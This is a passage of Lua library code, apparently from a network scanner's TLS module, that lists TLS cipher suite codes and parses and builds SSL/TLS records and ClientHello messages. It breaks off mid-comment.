  665. ["TLS_PSK_WITH_RC4_128_SHA"] = 0x008A,
  666. ["TLS_PSK_WITH_3DES_EDE_CBC_SHA"] = 0x008B,
  667. ["TLS_PSK_WITH_AES_128_CBC_SHA"] = 0x008C,
  668. ["TLS_PSK_WITH_AES_256_CBC_SHA"] = 0x008D,
  669. ["TLS_DHE_PSK_WITH_RC4_128_SHA"] = 0x008E,
  670. ["TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA"] = 0x008F,
  671. ["TLS_DHE_PSK_WITH_AES_128_CBC_SHA"] = 0x0090,
  672. ["TLS_DHE_PSK_WITH_AES_256_CBC_SHA"] = 0x0091,
  673. ["TLS_RSA_PSK_WITH_RC4_128_SHA"] = 0x0092,
  674. ["TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA"] = 0x0093,
  675. ["TLS_RSA_PSK_WITH_AES_128_CBC_SHA"] = 0x0094,
  676. ["TLS_RSA_PSK_WITH_AES_256_CBC_SHA"] = 0x0095,
  677. ["TLS_RSA_WITH_SEED_CBC_SHA"] = 0x0096,
  678. ["TLS_DH_DSS_WITH_SEED_CBC_SHA"] = 0x0097,
  679. ["TLS_DH_RSA_WITH_SEED_CBC_SHA"] = 0x0098,
  680. ["TLS_DHE_DSS_WITH_SEED_CBC_SHA"] = 0x0099,
  681. ["TLS_DHE_RSA_WITH_SEED_CBC_SHA"] = 0x009A,
  682. ["TLS_DH_anon_WITH_SEED_CBC_SHA"] = 0x009B,
  683. ["TLS_RSA_WITH_AES_128_GCM_SHA256"] = 0x009C,
  684. ["TLS_RSA_WITH_AES_256_GCM_SHA384"] = 0x009D,
  685. ["TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"] = 0x009E,
  686. ["TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"] = 0x009F,
  687. ["TLS_DH_RSA_WITH_AES_128_GCM_SHA256"] = 0x00A0,
  688. ["TLS_DH_RSA_WITH_AES_256_GCM_SHA384"] = 0x00A1,
  689. ["TLS_DHE_DSS_WITH_AES_128_GCM_SHA256"] = 0x00A2,
  690. ["TLS_DHE_DSS_WITH_AES_256_GCM_SHA384"] = 0x00A3,
  691. ["TLS_DH_DSS_WITH_AES_128_GCM_SHA256"] = 0x00A4,
  692. ["TLS_DH_DSS_WITH_AES_256_GCM_SHA384"] = 0x00A5,
  693. ["TLS_DH_anon_WITH_AES_128_GCM_SHA256"] = 0x00A6,
  694. ["TLS_DH_anon_WITH_AES_256_GCM_SHA384"] = 0x00A7,
  695. ["TLS_PSK_WITH_AES_128_GCM_SHA256"] = 0x00A8,
  696. ["TLS_PSK_WITH_AES_256_GCM_SHA384"] = 0x00A9,
  697. ["TLS_DHE_PSK_WITH_AES_128_GCM_SHA256"] = 0x00AA,
  698. ["TLS_DHE_PSK_WITH_AES_256_GCM_SHA384"] = 0x00AB,
  699. ["TLS_RSA_PSK_WITH_AES_128_GCM_SHA256"] = 0x00AC,
  700. ["TLS_RSA_PSK_WITH_AES_256_GCM_SHA384"] = 0x00AD,
  701. ["TLS_PSK_WITH_AES_128_CBC_SHA256"] = 0x00AE,
  702. ["TLS_PSK_WITH_AES_256_CBC_SHA384"] = 0x00AF,
  703. ["TLS_PSK_WITH_NULL_SHA256"] = 0x00B0,
  704. ["TLS_PSK_WITH_NULL_SHA384"] = 0x00B1,
  705. ["TLS_DHE_PSK_WITH_AES_128_CBC_SHA256"] = 0x00B2,
  706. ["TLS_DHE_PSK_WITH_AES_256_CBC_SHA384"] = 0x00B3,
  707. ["TLS_DHE_PSK_WITH_NULL_SHA256"] = 0x00B4,
  708. ["TLS_DHE_PSK_WITH_NULL_SHA384"] = 0x00B5,
  709. ["TLS_RSA_PSK_WITH_AES_128_CBC_SHA256"] = 0x00B6,
  710. ["TLS_RSA_PSK_WITH_AES_256_CBC_SHA384"] = 0x00B7,
  711. ["TLS_RSA_PSK_WITH_NULL_SHA256"] = 0x00B8,
  712. ["TLS_RSA_PSK_WITH_NULL_SHA384"] = 0x00B9,
  713. ["TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BA,
  714. ["TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BB,
  715. ["TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BC,
  716. ["TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BD,
  717. ["TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BE,
  718. ["TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BF,
  719. ["TLS_EMPTY_RENEGOTIATION_INFO_SCSV"] = 0x00FF,
  720. ["TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C0,
  721. ["TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C1,
  722. ["TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C2,
  723. ["TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C3,
  724. ["TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C4,
  725. ["TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C5,
  726. ["TLS_ECDH_ECDSA_WITH_NULL_SHA"] = 0xC001,
  727. ["TLS_ECDH_ECDSA_WITH_RC4_128_SHA"] = 0xC002,
  728. ["TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA"] = 0xC003,
  729. ["TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA"] = 0xC004,
  730. ["TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA"] = 0xC005,
  731. ["TLS_ECDHE_ECDSA_WITH_NULL_SHA"] = 0xC006,
  732. ["TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"] = 0xC007,
  733. ["TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA"] = 0xC008,
  734. ["TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA"] = 0xC009,
  735. ["TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA"] = 0xC00A,
  736. ["TLS_ECDH_RSA_WITH_NULL_SHA"] = 0xC00B,
  737. ["TLS_ECDH_RSA_WITH_RC4_128_SHA"] = 0xC00C,
  738. ["TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA"] = 0xC00D,
  739. ["TLS_ECDH_RSA_WITH_AES_128_CBC_SHA"] = 0xC00E,
  740. ["TLS_ECDH_RSA_WITH_AES_256_CBC_SHA"] = 0xC00F,
  741. ["TLS_ECDHE_RSA_WITH_NULL_SHA"] = 0xC010,
  742. ["TLS_ECDHE_RSA_WITH_RC4_128_SHA"] = 0xC011,
  743. ["TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA"] = 0xC012,
  744. ["TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"] = 0xC013,
  745. ["TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"] = 0xC014,
  746. ["TLS_ECDH_anon_WITH_NULL_SHA"] = 0xC015,
  747. ["TLS_ECDH_anon_WITH_RC4_128_SHA"] = 0xC016,
  748. ["TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA"] = 0xC017,
  749. ["TLS_ECDH_anon_WITH_AES_128_CBC_SHA"] = 0xC018,
  750. ["TLS_ECDH_anon_WITH_AES_256_CBC_SHA"] = 0xC019,
  751. ["TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA"] = 0xC01A,
  752. ["TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA"] = 0xC01B,
  753. ["TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA"] = 0xC01C,
  754. ["TLS_SRP_SHA_WITH_AES_128_CBC_SHA"] = 0xC01D,
  755. ["TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA"] = 0xC01E,
  756. ["TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA"] = 0xC01F,
  757. ["TLS_SRP_SHA_WITH_AES_256_CBC_SHA"] = 0xC020,
  758. ["TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA"] = 0xC021,
  759. ["TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA"] = 0xC022,
  760. ["TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256"] = 0xC023,
  761. ["TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384"] = 0xC024,
  762. ["TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256"] = 0xC025,
  763. ["TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384"] = 0xC026,
  764. ["TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256"] = 0xC027,
  765. ["TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384"] = 0xC028,
  766. ["TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256"] = 0xC029,
  767. ["TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384"] = 0xC02A,
  768. ["TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"] = 0xC02B,
  769. ["TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"] = 0xC02C,
  770. ["TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256"] = 0xC02D,
  771. ["TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384"] = 0xC02E,
  772. ["TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"] = 0xC02F,
  773. ["TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"] = 0xC030,
  774. ["TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256"] = 0xC031,
  775. ["TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384"] = 0xC032,
  776. ["TLS_ECDHE_PSK_WITH_RC4_128_SHA"] = 0xC033,
  777. ["TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA"] = 0xC034,
  778. ["TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA"] = 0xC035,
  779. ["TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA"] = 0xC036,
  780. ["TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256"] = 0xC037,
  781. ["TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384"] = 0xC038,
  782. ["TLS_ECDHE_PSK_WITH_NULL_SHA"] = 0xC039,
  783. ["TLS_ECDHE_PSK_WITH_NULL_SHA256"] = 0xC03A,
  784. ["TLS_ECDHE_PSK_WITH_NULL_SHA384"] = 0xC03B,
  785. ["TLS_RSA_WITH_ARIA_128_CBC_SHA256"] = 0xC03C,
  786. ["TLS_RSA_WITH_ARIA_256_CBC_SHA384"] = 0xC03D,
  787. ["TLS_DH_DSS_WITH_ARIA_128_CBC_SHA256"] = 0xC03E,
  788. ["TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384"] = 0xC03F,
  789. ["TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256"] = 0xC040,
  790. ["TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384"] = 0xC041,
  791. ["TLS_DHE_DSS_WITH_ARIA_128_CBC_SHA256"] = 0xC042,
  792. ["TLS_DHE_DSS_WITH_ARIA_256_CBC_SHA384"] = 0xC043,
  793. ["TLS_DHE_RSA_WITH_ARIA_128_CBC_SHA256"] = 0xC044,
  794. ["TLS_DHE_RSA_WITH_ARIA_256_CBC_SHA384"] = 0xC045,
  795. ["TLS_DH_anon_WITH_ARIA_128_CBC_SHA256"] = 0xC046,
  796. ["TLS_DH_anon_WITH_ARIA_256_CBC_SHA384"] = 0xC047,
  797. ["TLS_ECDHE_ECDSA_WITH_ARIA_128_CBC_SHA256"] = 0xC048,
  798. ["TLS_ECDHE_ECDSA_WITH_ARIA_256_CBC_SHA384"] = 0xC049,
  799. ["TLS_ECDH_ECDSA_WITH_ARIA_128_CBC_SHA256"] = 0xC04A,
  800. ["TLS_ECDH_ECDSA_WITH_ARIA_256_CBC_SHA384"] = 0xC04B,
  801. ["TLS_ECDHE_RSA_WITH_ARIA_128_CBC_SHA256"] = 0xC04C,
  802. ["TLS_ECDHE_RSA_WITH_ARIA_256_CBC_SHA384"] = 0xC04D,
  803. ["TLS_ECDH_RSA_WITH_ARIA_128_CBC_SHA256"] = 0xC04E,
  804. ["TLS_ECDH_RSA_WITH_ARIA_256_CBC_SHA384"] = 0xC04F,
  805. ["TLS_RSA_WITH_ARIA_128_GCM_SHA256"] = 0xC050,
  806. ["TLS_RSA_WITH_ARIA_256_GCM_SHA384"] = 0xC051,
  807. ["TLS_DHE_RSA_WITH_ARIA_128_GCM_SHA256"] = 0xC052,
  808. ["TLS_DHE_RSA_WITH_ARIA_256_GCM_SHA384"] = 0xC053,
  809. ["TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256"] = 0xC054,
  810. ["TLS_DH_RSA_WITH_ARIA_256_GCM_SHA384"] = 0xC055,
  811. ["TLS_DHE_DSS_WITH_ARIA_128_GCM_SHA256"] = 0xC056,
  812. ["TLS_DHE_DSS_WITH_ARIA_256_GCM_SHA384"] = 0xC057,
  813. ["TLS_DH_DSS_WITH_ARIA_128_GCM_SHA256"] = 0xC058,
  814. ["TLS_DH_DSS_WITH_ARIA_256_GCM_SHA384"] = 0xC059,
  815. ["TLS_DH_anon_WITH_ARIA_128_GCM_SHA256"] = 0xC05A,
  816. ["TLS_DH_anon_WITH_ARIA_256_GCM_SHA384"] = 0xC05B,
  817. ["TLS_ECDHE_ECDSA_WITH_ARIA_128_GCM_SHA256"] = 0xC05C,
  818. ["TLS_ECDHE_ECDSA_WITH_ARIA_256_GCM_SHA384"] = 0xC05D,
  819. ["TLS_ECDH_ECDSA_WITH_ARIA_128_GCM_SHA256"] = 0xC05E,
  820. ["TLS_ECDH_ECDSA_WITH_ARIA_256_GCM_SHA384"] = 0xC05F,
  821. ["TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256"] = 0xC060,
  822. ["TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384"] = 0xC061,
  823. ["TLS_ECDH_RSA_WITH_ARIA_128_GCM_SHA256"] = 0xC062,
  824. ["TLS_ECDH_RSA_WITH_ARIA_256_GCM_SHA384"] = 0xC063,
  825. ["TLS_PSK_WITH_ARIA_128_CBC_SHA256"] = 0xC064,
  826. ["TLS_PSK_WITH_ARIA_256_CBC_SHA384"] = 0xC065,
  827. ["TLS_DHE_PSK_WITH_ARIA_128_CBC_SHA256"] = 0xC066,
  828. ["TLS_DHE_PSK_WITH_ARIA_256_CBC_SHA384"] = 0xC067,
  829. ["TLS_RSA_PSK_WITH_ARIA_128_CBC_SHA256"] = 0xC068,
  830. ["TLS_RSA_PSK_WITH_ARIA_256_CBC_SHA384"] = 0xC069,
  831. ["TLS_PSK_WITH_ARIA_128_GCM_SHA256"] = 0xC06A,
  832. ["TLS_PSK_WITH_ARIA_256_GCM_SHA384"] = 0xC06B,
  833. ["TLS_DHE_PSK_WITH_ARIA_128_GCM_SHA256"] = 0xC06C,
  834. ["TLS_DHE_PSK_WITH_ARIA_256_GCM_SHA384"] = 0xC06D,
  835. ["TLS_RSA_PSK_WITH_ARIA_128_GCM_SHA256"] = 0xC06E,
  836. ["TLS_RSA_PSK_WITH_ARIA_256_GCM_SHA384"] = 0xC06F,
  837. ["TLS_ECDHE_PSK_WITH_ARIA_128_CBC_SHA256"] = 0xC070,
  838. ["TLS_ECDHE_PSK_WITH_ARIA_256_CBC_SHA384"] = 0xC071,
  839. ["TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC072,
  840. ["TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC073,
  841. ["TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC074,
  842. ["TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC075,
  843. ["TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC076,
  844. ["TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC077,
  845. ["TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC078,
  846. ["TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC079,
  847. ["TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC07A,
  848. ["TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC07B,
  849. ["TLS_DHE_RSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC07C,
  850. ["TLS_DHE_RSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC07D,
  851. ["TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC07E,
  852. ["TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC07F,
  853. ["TLS_DHE_DSS_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC080,
  854. ["TLS_DHE_DSS_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC081,
  855. ["TLS_DH_DSS_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC082,
  856. ["TLS_DH_DSS_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC083,
  857. ["TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC084,
  858. ["TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC085,
  859. ["TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC086,
  860. ["TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC087,
  861. ["TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC088,
  862. ["TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC089,
  863. ["TLS_ECDHE_RSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC08A,
  864. ["TLS_ECDHE_RSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC08B,
  865. ["TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC08C,
  866. ["TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC08D,
  867. ["TLS_PSK_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC08E,
  868. ["TLS_PSK_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC08F,
  869. ["TLS_DHE_PSK_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC090,
  870. ["TLS_DHE_PSK_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC091,
  871. ["TLS_RSA_PSK_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC092,
  872. ["TLS_RSA_PSK_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC093,
  873. ["TLS_PSK_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC094,
  874. ["TLS_PSK_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC095,
  875. ["TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC096,
  876. ["TLS_DHE_PSK_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC097,
  877. ["TLS_RSA_PSK_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC098,
  878. ["TLS_RSA_PSK_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC099,
  879. ["TLS_ECDHE_PSK_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC09A,
  880. ["TLS_ECDHE_PSK_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC09B,
  881. ["TLS_RSA_WITH_AES_128_CCM"] = 0xC09C,
  882. ["TLS_RSA_WITH_AES_256_CCM"] = 0xC09D,
  883. ["TLS_DHE_RSA_WITH_AES_128_CCM"] = 0xC09E,
  884. ["TLS_DHE_RSA_WITH_AES_256_CCM"] = 0xC09F,
  885. ["TLS_RSA_WITH_AES_128_CCM_8"] = 0xC0A0,
  886. ["TLS_RSA_WITH_AES_256_CCM_8"] = 0xC0A1,
  887. ["TLS_DHE_RSA_WITH_AES_128_CCM_8"] = 0xC0A2,
  888. ["TLS_DHE_RSA_WITH_AES_256_CCM_8"] = 0xC0A3,
  889. ["TLS_PSK_WITH_AES_128_CCM"] = 0xC0A4,
  890. ["TLS_PSK_WITH_AES_256_CCM"] = 0xC0A5,
  891. ["TLS_DHE_PSK_WITH_AES_128_CCM"] = 0xC0A6,
  892. ["TLS_DHE_PSK_WITH_AES_256_CCM"] = 0xC0A7,
  893. ["TLS_PSK_WITH_AES_128_CCM_8"] = 0xC0A8,
  894. ["TLS_PSK_WITH_AES_256_CCM_8"] = 0xC0A9,
  895. ["TLS_PSK_DHE_WITH_AES_128_CCM_8"] = 0xC0AA,
  896. ["TLS_PSK_DHE_WITH_AES_256_CCM_8"] = 0xC0AB,
  897. ["TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256"] = 0xCC13,
  898. ["TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"] = 0xCC14,
  899. ["TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256"] = 0xCC15,
  900. ["SSL_RSA_FIPS_WITH_DES_CBC_SHA"] = 0xFEFE,
  901. ["SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"] = 0xFEFF,
  902. }
  903.  
  904. local function find_key(t, value)
  905. local k, v
  906.  
  907. for k, v in pairs(t) do
  908. if v == value then
  909. return k
  910. end
  911. end
  912.  
  913. return nil
  914. end
  915.  
  916. ---
  917. -- Read a SSL/TLS record
  918. -- @param buffer The read buffer
  919. -- @param i The position in the buffer to start reading
  920. -- @return The current position in the buffer
  921. -- @return The record that was read, as a table
  922. function record_read(buffer, i)
  923. local b, h, j, len
  924.  
  925. ------------
  926. -- Header --
  927. ------------
  928.  
  929. -- Ensure we have enough data for the header.
  930. if #buffer - i < TLS_RECORD_HEADER_LENGTH then
  931. return i, nil
  932. end
  933.  
  934. -- Parse header.
  935. h = {}
  936. j, h["type"] = bin.unpack("C", buffer, i)
  937. j, h["protocol"] = bin.unpack(">S", buffer, j)
  938. j, h["length"] = bin.unpack(">S", buffer, j)
  939.  
  940. -- Ensure we have enough data for the body.
  941. len = j + h["length"] - 1
  942. if #buffer < len then
  943. return i, nil
  944. end
  945.  
  946. -- Convert to human-readable form.
  947. h["type"] = find_key(TLS_CONTENTTYPE_REGISTRY, h["type"])
  948. h["protocol"] = find_key(PROTOCOLS, h["protocol"])
  949.  
  950. ----------
  951. -- Body --
  952. ----------
  953.  
  954. h["body"] = {}
  955. while j < len do
  956. -- RFC 2246, 6.2.1 "multiple client messages of the same ContentType may
  957. -- be coalesced into a single TLSPlaintext record"
  958. -- TODO: implement reading of fragmented records
  959. b = {}
  960. table.insert(h["body"], b)
  961. if h["type"] == "alert" then
  962. -- Parse body.
  963. j, b["level"] = bin.unpack("C", buffer, j)
  964. j, b["description"] = bin.unpack("C", buffer, j)
  965.  
  966. -- Convert to human-readable form.
  967. b["level"] = find_key(TLS_ALERT_LEVELS, b["level"])
  968. b["description"] = find_key(TLS_ALERT_REGISTRY, b["description"])
  969. elseif h["type"] == "handshake" then
  970. -- Parse body.
  971. j, b["type"] = bin.unpack("C", buffer, j)
  972. local blen, blen_upper
  973. j, blen_upper, blen = bin.unpack("C>S", buffer, j)
  974. blen = blen + blen_upper * 0x10000
  975. local msg_end = j + blen
  976.  
  977. -- Convert to human-readable form.
  978. b["type"] = find_key(TLS_HANDSHAKETYPE_REGISTRY, b["type"])
  979.  
  980. if b["type"] == "server_hello" then
  981. -- Parse body.
  982. j, b["protocol"] = bin.unpack(">S", buffer, j)
  983. j, b["time"] = bin.unpack(">I", buffer, j)
  984. j, b["random"] = bin.unpack("A28", buffer, j)
  985. j, b["session_id_length"] = bin.unpack("C", buffer, j)
  986. j, b["session_id"] = bin.unpack("A" .. b["session_id_length"], buffer, j)
  987. j, b["cipher"] = bin.unpack(">S", buffer, j)
  988. j, b["compressor"] = bin.unpack("C", buffer, j)
  989. -- Optional extensions for TLS only
  990. if j < msg_end and h["protocol"] ~= "SSLv3" then
  991. local num_exts
  992. b["extensions"] = {}
  993. j, num_exts = bin.unpack(">S", buffer, j)
  994. for e = 0, num_exts do
  995. if j >= msg_end then break end
  996. local extcode, datalen
  997. j, extcode = bin.unpack(">S", buffer, j)
  998. extcode = find_key(EXTENSIONS, extcode) or extcode
  999. j, b["extensions"][extcode] = bin.unpack(">P", buffer, j)
  1000. end
  1001. end
  1002.  
  1003. -- Convert to human-readable form.
  1004. b["protocol"] = find_key(PROTOCOLS, b["protocol"])
  1005. b["cipher"] = find_key(CIPHERS, b["cipher"])
  1006. b["compressor"] = find_key(COMPRESSORS, b["compressor"])
  1007. else
  1008. -- TODO: implement other handshake message types
  1009. stdnse.print_debug(2, "Unknown handshake message type: %s", b["type"])
  1010. j = msg_end
  1011. end
  1012. elseif h["type"] == "heartbeat" then
  1013. j, b["type"], b["payload_length"] = bin.unpack("C>S", buffer, j)
  1014. j, b["payload"], b["padding"] = bin.unpack("PP", buffer, j)
  1015. else
  1016. stdnse.print_debug("Unknown message type: %s", h["type"])
  1017. end
  1018. end
  1019.  
  1020. -- Ignore unparsed bytes.
  1021. j = len+1
  1022.  
  1023. return j, h
  1024. end
  1025.  
  1026. ---
  1027. -- Build a SSL/TLS record
  1028. -- @param type The type of record ("handshake", "change_cipher_spec", etc.)
  1029. -- @param protocol The protocol and version ("SSLv3", "TLSv1.0", etc.)
  1030. -- @param b The record body
  1031. -- @return The SSL/TLS record as a string
  1032. function record_write(type, protocol, b)
  1033. return table.concat({
  1034. -- Set the header as a handshake.
  1035. bin.pack("C", TLS_CONTENTTYPE_REGISTRY[type]),
  1036. -- Set the protocol.
  1037. bin.pack(">S", PROTOCOLS[protocol]),
  1038. -- Set the length of the header body.
  1039. bin.pack(">S", #b),
  1040. b
  1041. })
  1042. end
  1043.  
  1044. ---
  1045. -- Build a client_hello message
  1046. --
  1047. -- The options table has the following keys:
  1048. -- * <code>"protocol"</code> - The TLS protocol version string
  1049. -- * <code>"ciphers"</code> - a table containing the cipher suite names. Defaults to the NULL cipher
  1050. -- * <code>"compressors"</code> - a table containing the compressor names. Default: NULL
  1051. -- * <code>"extensions"</code> - a table containing the extension names. Default: no extensions
  1052. -- @param t Table of options
  1053. -- @return The client_hello record as a string
  1054. function client_hello(t)
  1055. local b, ciphers, compressor, compressors, h, len
  1056.  
  1057. ----------
  1058. -- Body --
  1059. ----------
  1060.  
  1061. b = {}
  1062. -- Set the protocol.
  1063. table.insert(b, bin.pack(">S", PROTOCOLS[t["protocol"]]))
  1064.  
  1065. -- Set the random data.
  1066. table.insert(b, bin.pack(">I", os.time()))
  1067.  
  1068. -- Set the random data.
  1069. table.insert(b, stdnse.generate_random_string(28))
  1070.  
  1071. -- Set the session ID.
  1072. table.insert(b, bin.pack("C", 0))
  1073.  
  1074. -- Cipher suites.
  1075. ciphers = {}
  1076. if t["ciphers"] ~= nil then
  1077. -- Add specified ciphers.
  1078. for _, cipher in pairs(t["ciphers"]) do
  1079. table.insert(ciphers, bin.pack(">S", CIPHERS[cipher]))
  1080. end
  1081. else
  1082. -- Use NULL cipher
  1083. table.insert(ciphers, bin.pack(">S", CIPHERS["TLS_NULL_WITH_NULL_NULL"]))
  1084. end
  1085. table.insert(b, bin.pack(">P", table.concat(ciphers)))
  1086.  
  1087. -- Compression methods.
  1088. compressors = {}
  1089. if t["compressors"] ~= nil then
  1090. -- Add specified compressors.
  1091. for _, compressor in pairs(t["compressors"]) do
  1092. if compressor ~= "NULL" then
  1093. table.insert(compressors, bin.pack("C", COMPRESSORS[compressor]))
  1094. end
  1095. end
  1096. end
  1097. -- Always include NULL as last choice
  1098. table.insert(compressors, bin.pack("C", COMPRESSORS["NULL"]))
  1099. table.insert(b, bin.pack(">p", table.concat(compressors)))
  1100.  
  1101. -- TLS extensions
  1102. if PROTOCOLS[t["protocol"]] and
  1103. PROTOCOLS[t["protocol"]] ~= PROTOCOLS["SSLv3"] then
  1104. local extensions = {}
  1105. if t["extensions"] ~= nil then
  1106. -- Add specified extensions.
  1107. for extension, data in pairs(t["extensions"]) do
  1108. if type(extension) == "number" then
  1109. table.insert(extensions, bin.pack(">S", extension))
  1110. else
  1111. table.insert(extensions, bin.pack(">S", EXTENSIONS[extension]))
  1112. end
  1113. table.insert(extensions, bin.pack(">P", data))
  1114. end
  1115. end
  1116. -- Extensions are optional
  1117. if #extensions ~= 0 then
  1118. table.insert(b, bin.pack(">P", table.concat(extensions)))
  1119. end
  1120. end
  1121.  
  1122. ------------
  1123. -- Header --
  1124. ------------
  1125.  
  1126. b = table.concat(b)
  1127.  
  1128. h = {}
  1129.  
  1130. -- Set type to ClientHello.
  1131. table.insert(h, bin.pack("C", TLS_HANDSHAKETYPE_REGISTRY["client_hello"]))
  1132.  
  1133. -- Set the length of the body.
  1134. len = bin.pack(">I", #b)
  1135. -- body length is 24 bits big-endian, so the 3 LSB of len
  1136. table.insert(h, len:sub(2,4))
  1137.  
  1138. table.insert(h, b)
  1139.  
  1140. return record_write("handshake", t["protocol"], table.concat(h))
  1141. end
  1142.  
  1143. local function read_atleast(s, n)
  1144. local buf = {}
  1145. local count = 0
  1146. while count < n do
  1147. local status, data = s:receive_bytes(n - count)
  1148. if not status then
  1149. return status, data, table.concat(buf)
  1150. end
  1151. buf[#buf+1] = data
  1152. count = count + #data
  1153. end
  1154. return true, table.concat(buf)
  1155. end
  1156.  
  1157. --- Get an entire record into a buffer
  1158. --
  1159. -- Caller is responsible for closing the socket if necessary.
  1160. -- @param sock The socket to read additional data from
